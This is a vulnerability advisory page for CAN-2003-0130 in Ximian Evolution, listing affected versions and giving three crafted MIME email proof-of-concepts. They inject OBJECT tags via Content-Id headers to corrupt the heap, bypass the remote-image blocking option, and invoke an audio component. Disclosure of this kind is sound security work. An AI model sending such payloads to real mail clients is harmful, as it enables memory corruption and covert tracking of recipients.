exploits , vulnerabilities , articles , Ximian Evolution MIME image/* Content-Type Data Inclusion Vulnerability

Title	Ximian Evolution MIME image/* Content-Type Data Inclusion Vulnerability
Published	2003-03-19-12:00AM
Updated	2003-05-14-07:52PM
Class	Input Validation Error
CVE	CAN-2003-0130
Remote	Yes
Local	No
Credit	Discovered by Diego Kelyacoubian, Javier Kohen, Alberto Solino, and Juan Vera of Core Security Technologies.
Vulnerable	Ximian Evolution 1.2.2 MandrakeSoft Linux Mandrake 9.1 MandrakeSoft Linux Mandrake 9.1 ppc RedHat Linux 9.0 i386 Ximian Evolution 1.2.1 Ximian Evolution 1.2 Ximian Evolution 1.1.1 Ximian Evolution 1.0.8 MandrakeSoft Linux Mandrake 9.0 Ximian Evolution 1.0.7 Ximian Evolution 1.0.6 Ximian Evolution 1.0.5 Debian Linux 3.0 Debian Linux 3.0 alpha Debian Linux 3.0 arm Debian Linux 3.0 hppa Debian Linux 3.0 ia32 Debian Linux 3.0 ia64 Debian Linux 3.0 m68k Debian Linux 3.0 mips Debian Linux 3.0 mipsel Debian Linux 3.0 ppc Debian Linux 3.0 s/390 Debian Linux 3.0 sparc Ximian Evolution 1.0.4 Ximian Evolution 1.0.3 Conectiva Linux 7.0 Conectiva Linux 8.0 RedHat Linux 7.3
Not Vulnerable	Ximian Evolution 1.2.3
Code	The following example will cause heap corruption: >From xxx@corest.com Wed Mar 5 14:06:02 2003 Subject: xxx From: X X. X <xxx@corest.com> To: xxx@corest.com Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" Message-Id: <1046884154.1731.5.camel@vaiolin> Mime-Version: 1.0 Date: 05 Mar 2003 14:09:14 -0300 --=-mTDu5zdJIsixETTwCF5Y Content-Type: text/plain Content-Transfer-Encoding: 7bit Content-Id: hello Hello World! --=-mTDu5zdJIsixETTwCF5Y Content-Disposition: attachment; filename=name1.gif Content-Type: image/gif; name=name1.gif Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr " Content-Transfer-Encoding: base64 --=-mTDu5zdJIsixETTwCF5Y Content-Disposition: attachment; filename=name2.gif Content-Type: image/gif; name=name2.gif Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr " Content-Transfer-Encoding: base64 --=-mTDu5zdJIsixETTwCF5Y The following example will bypass the "Don't connect to remote hosts to fetch images" option: >From xxx@corest.com Wed Mar 5 14:06:02 2003 Subject: xxx From: X X. X <xxx@corest.com> To: xxx@corest.com Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" Message-Id: <1046884154.1731.5.camel@vaiolin> Mime-Version: 1.0 Date: 05 Mar 2003 14:09:14 -0300 --=-mTDu5zdJIsixETTwCF5Y Content-Type: text/html Content-Transfer-Encoding: 7bit Content-Id: apart <img src="http://external.host.com:anyport"> --=-mTDu5zdJIsixETTwCF5Y Content-Disposition: attachment; filename=name2.gif Content-Type: image/gif; name=name2.gif Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr " Content-Transfer-Encoding: base64 --=-mTDu5zdJIsixETTwCF5Y The following example will cause Evolution to invoke the bonobo-audio-ulaw component: >From xxx@corest.com Wed Mar 5 14:06:02 2003 Subject: xxx From: X X. X <xxx@corest.com> To: xxx@corest.com Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" Message-Id: <1046884154.1731.5.camel@vaiolin> Mime-Version: 1.0 Date: 05 Mar 2003 14:09:14 -0300 --=-mTDu5zdJIsixETTwCF5Y Content-Type: audio/ulaw Content-Transfer-Encoding: 7bit Content-Id: mysong There she was, just walking down the street... --=-mTDu5zdJIsixETTwCF5Y Content-Disposition: attachment; filename=name2.gif Content-Type: image/gif; name=name2.gif Content-Id: "><OBJECT classid="cid:mysong" type="audio/ulaw"></OBJECT><hr " Content-Transfer-Encoding: base64 --=-mTDu5zdJIsixETTwCF5Y
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
• 2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability
• 2009-12-17 Digital Scribe Cross Site Scripting and SQL Injection Vulnerabilities
• 2009-12-17 WP-Forum WordPress Plugin Multiple SQL Injection Vulnerabilities
• 2009-12-17 Quick Heal AntiVirus Insecure Program File Permissions Local Privilege Escalation Vulnerability
• 2009-12-17 IntelliCom NetBiter webSCADA Multiple Default Password Security Bypass Vulnerabilities
• 2009-12-17 Webmatic Multiple Unspecified SQL Injection and Cross-Site Scripting Vulnerabilities
• 2009-12-17 ManageEngine Password Manager Pro Cross Site Scripting Vulnerability
• 2009-12-17 HP OpenView Storage Data Protector Multiple Remote Code Execution Vulnerabilities
• 2009-12-17 iDevSpot iSupport Multiple Cross Site Scripting Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 01:16:44 +0000